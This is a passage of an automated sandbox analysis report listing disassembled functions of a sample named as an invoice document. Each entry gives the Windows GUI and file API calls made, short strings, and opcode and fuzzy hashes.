Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: TextWindow$ItemLength_strlen
String ID:
API String ID: 3582222401-0
Opcode ID: 75284332164254b5d71994aae6484f33fa2b45a03c15df6a1bfb95cd5cf29dcf
Instruction ID: 27241be4feecb4bc1ce035052670b37fc00b2139d1a9c08b8ffa28e91fc59950
Opcode Fuzzy Hash: 75284332164254b5d71994aae6484f33fa2b45a03c15df6a1bfb95cd5cf29dcf
Instruction Fuzzy Hash: 5001DF31204514EFAB253B28DC199FE77EEEF95760704025AF405E3250DFB4AC0187B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE92B, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BBE932
GetWindowTextA.USER32 ref: 00BBE949
__cftof.LIBCMT ref: 00BBE983
_strlen.LIBCMT ref: 00BBE996

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3TextWindow__cftof_strlen
String ID:
API String ID: 721212129-0
Opcode ID: f02edd987d72e05d8bb1ed1257cab9bfe20b592baeddc6f3d472b311013b2f3a
Instruction ID: a2f2de89f92a2ce0629a3f41dbe0e6a394e2a665c73dfc95215ef5c21c1712db
Opcode Fuzzy Hash: f02edd987d72e05d8bb1ed1257cab9bfe20b592baeddc6f3d472b311013b2f3a
Instruction Fuzzy Hash: 4D019236500115EBCF05AFA4CC419AD7BB1FF48320B044268FA25672A1DB709914DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8F27, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00BB8F31
GetTopWindow.USER32(00000000), ref: 00BB8F3E

Part of subcall function 00BB8F27: GetWindow.USER32(00000000,00000002), ref: 00BB8F8D

GetTopWindow.USER32(?), ref: 00BB8F72

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 364dbfc7ec40640ca7e32d3d40902545da8edb30c2a313c327ff39703deeb21f
Instruction ID: 9187e60dc7b69b35f7eab9e8a3de03efa98e05770493a124d49b8d5538c7fdee
Opcode Fuzzy Hash: 364dbfc7ec40640ca7e32d3d40902545da8edb30c2a313c327ff39703deeb21f
Instruction Fuzzy Hash: C9012C35105715EBCF221F618C14AFE3BDEEF11351B054990FD0495110DFB1C911DAE2

Uniqueness

Uniqueness Score: -1.00%

Function 00BFA62B, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000030,00000001,?,00BF3C8E,?,00000000), ref: 00BFA641
InvalidateRect.USER32(00000000,?,00000001), ref: 00BFA666
InvalidateRect.USER32(00000000,-00000030,00000001), ref: 00BFA68F
UpdateWindow.USER32(00000000), ref: 00BFA6A3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: InvalidateRect$UpdateWindow
String ID:
API String ID: 488614814-0
Opcode ID: 7aa01c56a03062cea41d987b39b52fd639079a43e80485e3387ecb21d6a05651
Instruction ID: b3eacbb51210edb6710269d796f684e8f9030f6bb6a1b7b9347b2fd235695b9d
Opcode Fuzzy Hash: 7aa01c56a03062cea41d987b39b52fd639079a43e80485e3387ecb21d6a05651
Instruction Fuzzy Hash: 56010CB2210700EFE7298B59DD84FA2B7F5FF08711F090599E64AD72A0C770A845CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BBEFF0, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BBEFFE
GetParent.USER32(?), ref: 00BBF011
GetParent.USER32(?), ref: 00BBF02B
SetFocus.USER32(?,00000000,?,?,?,?,?,?,80004005), ref: 00BBF044

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: fd07383d8cd5fd0365fbd1807c68626c3804cf5a626703f5eca59c4d03476174
Instruction ID: f9fdc478053b38e1fd1a11f30be2a2841d525f2f342ec330439d3f72ec1bc337
Opcode Fuzzy Hash: fd07383d8cd5fd0365fbd1807c68626c3804cf5a626703f5eca59c4d03476174
Instruction Fuzzy Hash: 93F0E472A00B01DBDE657BB0AC099BA7BF9BF8471170406A9B546C7632DEA9D801CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF61BB, Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF61C2

Part of subcall function 00BFA62B: InvalidateRect.USER32(00000000,00000030,00000001,?,00BF3C8E,?,00000000), ref: 00BFA641
Part of subcall function 00BFA62B: InvalidateRect.USER32(00000000,?,00000001), ref: 00BFA666
Part of subcall function 00BFA62B: UpdateWindow.USER32(00000000), ref: 00BFA6A3

Part of subcall function 00BB95C9: GetWindowTextLengthA.USER32(?), ref: 00BB95DB
Part of subcall function 00BB95C9: GetWindowTextA.USER32 ref: 00BB95F4

SendMessageA.USER32(?,00000158,000000FF,?), ref: 00BF620C
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00BF621D

Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBEFFE
Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBF011
Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBF02B
Part of subcall function 00BBEFF0: SetFocus.USER32(?,00000000,?,?,?,?,?,?,80004005), ref: 00BBF044

SendMessageA.USER32(?,0000014F,00000001,00000000), ref: 00BF6240

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageParentSendWindow$InvalidateRectText$FocusH_prolog3LengthUpdate
String ID:
API String ID: 490552972-0
Opcode ID: aa95cfdbff518420fa1ee5ec3fab577499fc3f9b130e51a8dedc7bbe241e8f44
Instruction ID: 094028c944ca00221b54a7c614b0c48486656a4f0a53f1674519a639f0e0023f
Opcode Fuzzy Hash: aa95cfdbff518420fa1ee5ec3fab577499fc3f9b130e51a8dedc7bbe241e8f44
Instruction Fuzzy Hash: 37017135250706EBEB14AB60CC06FE9B7B2FF44711F004658B6256B2F1CFB06814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BEEBE1, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

ScreenToClient.USER32 ref: 00BEEC05
PtInRect.USER32(?,?,?), ref: 00BEEC18
SetCapture.USER32(?), ref: 00BEEC25
RedrawWindow.USER32(?,00000000,00000000,00000401,00000000), ref: 00BEEC47

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CaptureClientRectRedrawScreenWindow
String ID:
API String ID: 2178243973-0
Opcode ID: 385715ded6985abe619d46f7068133bad71fb976a60ee65946b980344e8d01f4
Instruction ID: b5de305c93836a26f1519c2dc54ac7c4246724c031ddb17fc84c578543eceb26
Opcode Fuzzy Hash: 385715ded6985abe619d46f7068133bad71fb976a60ee65946b980344e8d01f4
Instruction Fuzzy Hash: FA01FB75500708FFDB149FA0CC49FDABBF9FB08704F108559F95A92250DBB5A950DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC5C2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2B11: __EH_prolog3_catch.LIBCMT ref: 00BC2B18

GetClientRect.USER32 ref: 00BCC62D

Part of subcall function 00BCDBF9: CoInitialize.OLE32(00000000), ref: 00BCDC19

Strings

T, xrefs: 00BCC647
T, xrefs: 00BCC5F1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientH_prolog3_catchInitializeRect
String ID: T$T
API String ID: 2181484717-3594344597
Opcode ID: 6d0a6acfc2412d48b1697e8e9c2fd303aea24434e766845157c727de987834ae
Instruction ID: 2a55264e30af87ab760391b6b2a2f0ccf79edeedb8095705b4af49ca76606ac6
Opcode Fuzzy Hash: 6d0a6acfc2412d48b1697e8e9c2fd303aea24434e766845157c727de987834ae
Instruction Fuzzy Hash: 7B515F71A10229EFCB10DFA9D991FAEBBF8EB58710F10516EE909E7240D7709D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC031, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFC038
SysAllocString.OLEAUT32(PropertyList), ref: 00BFC087

Strings

PropertyList, xrefs: 00BFC082

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocH_prolog3String
String ID: PropertyList
API String ID: 1826817320-1939653111
Opcode ID: ab3a146a55ec482cbfc7367f4dad95e6680ca54fdf772f1bef8cd220e255b577
Instruction ID: 826a57b20c87e6335c4c7b22ec0f702b1bee86680ceb9bb95723cf8ebfc18670
Opcode Fuzzy Hash: ab3a146a55ec482cbfc7367f4dad95e6680ca54fdf772f1bef8cd220e255b577
Instruction Fuzzy Hash: F4418E7060020ECFDB14DF64CA95BBDBBE4FF44310F10449AE615AB292DB709A99CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BFCBB6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFC972: IsWindow.USER32(?), ref: 00BFC980

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BFCBF8
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BFCC0E

Part of subcall function 00BA93A6: IsWindow.USER32(?), ref: 00BA93B2
Part of subcall function 00BA93A6: SendMessageA.USER32(?,0000110C,00000000,?), ref: 00BA93DB

Strings

N, xrefs: 00BFCBB9

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$Window
String ID: N
API String ID: 2326795674-1130791706
Opcode ID: de8ed40c6b978286b14b34a63b5bef76e9d56063e3c3d83e5981de744cfdfe8c
Instruction ID: 0a4486dd84c3af43de01f8ffd4cc2aecf6103c046e05653848d1c300af2dea29
Opcode Fuzzy Hash: de8ed40c6b978286b14b34a63b5bef76e9d56063e3c3d83e5981de744cfdfe8c
Instruction Fuzzy Hash: 6521F33160070CABDF245F559E44BBA7FE9FF84711F008069FB4A8B2A1CBB14894DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C00C9A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32 ref: 00C00CC8
CopyRect.USER32 ref: 00C00CDA

Strings

(, xrefs: 00C00CC1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: 416c9431cf6a774d7032ec1858224695a7ade6f150e9f0e39c9fa3fc0a7ed281
Instruction ID: d29b8a66e34e0df03d909fff287c910e8cdd6a3c75f2edcd340eaca0dde4cc16
Opcode Fuzzy Hash: 416c9431cf6a774d7032ec1858224695a7ade6f150e9f0e39c9fa3fc0a7ed281
Instruction Fuzzy Hash: C411B671A00609EFDB50CFA8D985ADEB7F4FB08300B618959E456E7251DB30FA45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C00CA5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32 ref: 00C00CC8
CopyRect.USER32 ref: 00C00CDA

Strings

(, xrefs: 00C00CC1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: bfbf01d83d697795461e0bbd027dea64680dffc13724c2ad9bc4123d7c442aa2
Instruction ID: adbdd31a6ee80cfe811dea4c4938518f7800b4a802321cce26907b9f486bf8a6
Opcode Fuzzy Hash: bfbf01d83d697795461e0bbd027dea64680dffc13724c2ad9bc4123d7c442aa2
Instruction Fuzzy Hash: 57119271A0060AEFDB50DFA8D985A9EB7F5FB08700B618959E856E3250DB30FA44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE9E1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00BAEA05
PathFindExtensionA.SHLWAPI(?), ref: 00BAEA1B

Part of subcall function 00BAE40C: __EH_prolog3_GS.LIBCMT ref: 00BAE416

Strings

%Ts%Ts.dll, xrefs: 00BAEA21

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ExtensionFileFindH_prolog3_ModuleNamePath
String ID: %Ts%Ts.dll
API String ID: 3433622546-1896370695
Opcode ID: 508e0001af7ef608b39941540e32d4a8177a2f813d2c9cc523b68f3b84e33f79
Instruction ID: 4dfc94bd86b7be056f8745f25babd45d475ecbbdb09fa03b3754a96e6b2a6d5a
Opcode Fuzzy Hash: 508e0001af7ef608b39941540e32d4a8177a2f813d2c9cc523b68f3b84e33f79
Instruction Fuzzy Hash: 05F0817190411CDBCB11DB64DC45AEFBBFCEB0A700F0504B5A915E7250DA70DA058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BD64C8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00BD64E5
GetLastError.KERNEL32 ref: 00BD64F2

Strings

@Mxt, xrefs: 00BD64F2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: @Mxt
API String ID: 442123175-1922883433
Opcode ID: fac727b369f09eebb681762bad42ca381f1e863efc4ce40099362baa659a625c
Instruction ID: eb2be9354dd76639dd0f87b0906ac5889c449a66efe3d801b686f95e43272f52
Opcode Fuzzy Hash: fac727b369f09eebb681762bad42ca381f1e863efc4ce40099362baa659a625c
Instruction Fuzzy Hash: 6FF02431500208FBCB009F65DC45E9BB7ECEF41768F2042AAF510A7290E631DE068770

Uniqueness

Uniqueness Score: -1.00%

Function 00BD651D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BD664E,?,?,?,00BCEF11,?,?,?,?), ref: 00BD6529
_strlen.LIBCMT ref: 00BD654A

Strings

@Mxt, xrefs: 00BD6529

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorLast_strlen
String ID: @Mxt
API String ID: 2582954400-1922883433
Opcode ID: 9555069c712a092b8be20548e21f9a6285861b554091164ad75be7ad1bd2b0c3
Instruction ID: 2abd13143bc8741dded0f41ad06346259133db0bd9efe025937412c12580975c
Opcode Fuzzy Hash: 9555069c712a092b8be20548e21f9a6285861b554091164ad75be7ad1bd2b0c3
Instruction Fuzzy Hash: A8E06D32901724AB46216F29A8469BFB7DDEE55761304895AF906A7300E634B94147F4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD62AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD62CA
GetLastError.KERNEL32 ref: 00BD62D7

Strings

@Mxt, xrefs: 00BD62D7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: @Mxt
API String ID: 1948546556-1922883433
Opcode ID: 3832bcc9366347975f5513338b2529e36d4fc8f4f628e11e4d3f749355c4d766
Instruction ID: 9f45703c5d80b35a464db4ec01604fdd4dea261691b07236c537d668bb4701e2
Opcode Fuzzy Hash: 3832bcc9366347975f5513338b2529e36d4fc8f4f628e11e4d3f749355c4d766
Instruction Fuzzy Hash: BCE0C972510214FFCF119BA5DC05ADABBECFB04765F1085AAB955E7210E774EA00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC214D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00E47EA8,00000000,00E47EA4,00BC23E7,00000000,00C06355,00000000,?,?,?,00C06A80,00000000,00000000), ref: 00BC215F
GetLastError.KERNEL32(?,?,?,00C06A80,00000000,00000000), ref: 00BC2169

Strings

@Mxt, xrefs: 00BC2169

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: @Mxt
API String ID: 439134102-1922883433
Opcode ID: 6f9ca6f99222fe94330e568ee89a8522c6873bf5c153b0aa7b2f50734ed1fabc
Instruction ID: c24844faa7299cedb832225695421f45124c3200760389c095590ae51d6ceae8
Opcode Fuzzy Hash: 6f9ca6f99222fe94330e568ee89a8522c6873bf5c153b0aa7b2f50734ed1fabc
